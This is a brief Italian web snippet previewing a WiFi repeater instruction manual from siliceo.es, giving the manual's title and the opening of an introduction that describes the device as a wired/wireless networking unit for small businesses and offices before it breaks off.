www.siliceo.es WiFi-Repeater Manuale di istruzioni WiFi-Repeater Manuale di istruzioni ITALIANO Introduzione Il ripetitore WiFi è un dispositivo di connessione di rete cablata / wireless progettato specificamente per le piccole imprese, l'ufficio e la

Dettagli